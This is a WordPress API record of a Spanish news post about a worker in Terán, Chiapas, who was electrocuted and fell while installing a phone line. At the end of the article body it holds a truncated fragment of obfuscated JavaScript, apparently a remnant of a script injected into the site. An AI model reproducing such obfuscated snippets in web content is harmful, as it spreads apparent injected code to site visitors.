{"id":5449,"date":"2022-09-28T00:00:41","date_gmt":"2022-09-28T00:00:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5449"},"modified":"2022-09-28T00:00:42","modified_gmt":"2022-09-28T00:00:42","slug":"hombre-se-electrocuta-mientras-laboraba-en-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5449","title":{"rendered":"Hombre se electrocuta mientras laboraba en Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"460\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0012-460x1024.jpg\" alt=\"\" class=\"wp-image-5450\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0012-460x1024.jpg 460w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0012-135x300.jpg 135w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0012-690x1536.jpg 690w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0012.jpg 719w\" sizes=\"auto, (max-width: 460px) 100vw, 460px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un trabajador de una empresa recibi\u00f3 una descarga el\u00e9ctrica mientras trabajaba en la instalaci\u00f3n de una l\u00ednea telef\u00f3nica en la delegaci\u00f3n Ter\u00e1n.<\/p>\n\n\n\n<p>Los hechos ocurrieron este martes sobre la 4a Norte, entre 4a y 5a Poniente de la citada delegaci\u00f3n, cuando Wilber de 31 a\u00f1os de edad cuando de manera repentina al estar sobre la escalera hizo una mala maniobra y ocasion\u00f3 que tocara una l\u00ednea de mediana tensi\u00f3n y recibi\u00f3 la descarga.<\/p>\n\n\n\n<p>Esto provoc\u00f3 que cayera de una altura de cinco metros, resultando con varias lesiones.<\/p>\n\n\n\n<p>Sus compa\u00f1eros llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Param\u00e9dicos de la Cruz Roja arribaron al lugar para trasladar al nosocomio al empleado donde fue reportado como estable.<\/p>\n\n\n\n<p>Polic\u00edas tambi\u00e9n apoyaron a acordonar el \u00e1rea para agilizar las labores de auxilio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un trabajador de una empresa recibi\u00f3 una descarga el\u00e9ctrica mientras trabajaba en la instalaci\u00f3n de una l\u00ednea telef\u00f3nica en la delegaci\u00f3n Ter\u00e1n. Los hechos ocurrieron este martes sobre la 4a Norte, entre 4a y 5a Poniente de la citada delegaci\u00f3n, cuando Wilber de 31 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5450,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5449","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5449"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5449\/revisions"}],"predecessor-version":[{"id":5451,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5449\/revisions\/5451"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5450"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}